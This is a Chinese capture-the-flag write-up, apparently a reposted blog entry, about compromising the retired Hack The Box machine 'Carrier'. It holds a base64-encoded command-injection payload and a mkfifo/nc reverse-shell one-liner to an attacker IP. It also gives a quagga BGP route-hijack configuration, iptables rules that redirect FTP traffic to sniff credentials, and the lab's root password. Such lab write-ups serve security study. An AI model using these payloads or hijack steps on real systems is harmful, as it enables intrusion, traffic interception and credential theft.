zoukankan      html  css  js  c++  java
  • HTB-靶机-Carrier

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.105

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.105 -o ./Carrier-autorecon

    开放了21,22,80,还有udp端口161

    看以下爆破的目录

    访问一下目录看下

     

    收集到上面的信息,可以得出登录remote.php页面的账户和密码,具体如下:

    1.通过snmpwalk得出了目标设备的序列号
    2.根据此页面的错误代码信息http://10.10.10.105/doc/error_codes.pdf,再通过登录界面显示的错误代码45007和45009
    3.综合上面两条可以得出账户是admin,密码是序列号NET_45JDX23

    使用上面的账户密码登录并点击里面的页面使用burpsuite进行抓包

    burpsuite请求包

    根据此请求包的相应显示猜测目标在接收上述POST请求之后,类似执行了查看进程的命令,ps aux | grep quagga 所以此处我们是可以通过分号来进行命令执行,测试的时候需要使用base64编码

    下面是执行了以下命令ls -la

    我们反弹shell

    下面经过base64编码之后即可反弹shell

    ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 8844 >/tmp/f

    成功反弹shell拿到了user.txt内容,看了下此shell的IP地址和arp信息,发现本机并非靶机10.10.10.105 我们还是需要继续探测

    此shell靶机是Linux操作系统上通过软件quagga搭建的思科软路由操作系统,可以当作路由器来使用,这里所用到的知识点涉及到BGP路由劫持技术,详情请查看如下链接补充

    https://www.cloudflare.com/zh-cn/learning/security/glossary/bgp-hijacking/
    https://www.freebuf.com/articles/network/75305.html
    https://ti.qianxin.com/uploads/2018/08/27/8ae73e3c6734f0d2001d848cfb323d01.pdf

    下面是配置BGP路由劫持,完成完成后就可以本地使用nc监听21端口获取ftp的账户和密码或者使用tcpdump都可以,此账户和密码同样可以使用ssh登录到目标靶机上

    r1# conf t
    r1(config)# ip prefix-list leak permit 10.120.15.0/25
    r1(config)# route-map to-as200 permit 10
    r1(config-route-map)# match ip address prefix-list leak
    r1(config-route-map)# set community no-export
    r1(config-route-map)# route-map to-as200 permit 20
    r1(config-route-map)# route-map to-as300 deny 10
    r1(config-route-map)# match ip address prefix-list leak
    r1(config-route-map)# route-map to-as300 permit 20
    r1(config-route-map)# router bgp 100
    r1(config-router)# network 10.120.15.0 mask 255.255.255.128
    r1(config-router)# end
    r1#
    tcpdump -vv -s0 -ni eth2 -c 10 port 21
    或者
    nc -lvnp 21
    也可以使用iptable将21端口使用nat技术转到本地kali的21端口然后nc监听
    iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.14.6:21
    iptables -t nat -A POSTROUTING -j MASQUERADE

    我这里测试监听21端口拿账户和密码有些问题,不知道啥原因,有测试成功的同学反馈下,最终的账户和密码是

    root/BGPtelc0rout1ng

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    java 全组合 与全排列
    (转)java +libsvm 安装与测试:
    ictclas4j 分词工具包 安装流程
    (转)超详细单机版搭建hadoop环境图文解析
    HTML+CSS 滚动条样式自定义
    HTML+CSS之iframe
    思维导图工具 & 原型设计工具
    js setInterval 启用&停止
    jquery 获取 checkbox 的 checked 状态问题
    几个实用的 jQuery 插件
  • 原文地址:https://www.cnblogs.com/autopwn/p/14138206.html
Copyright © 2011-2022 走看看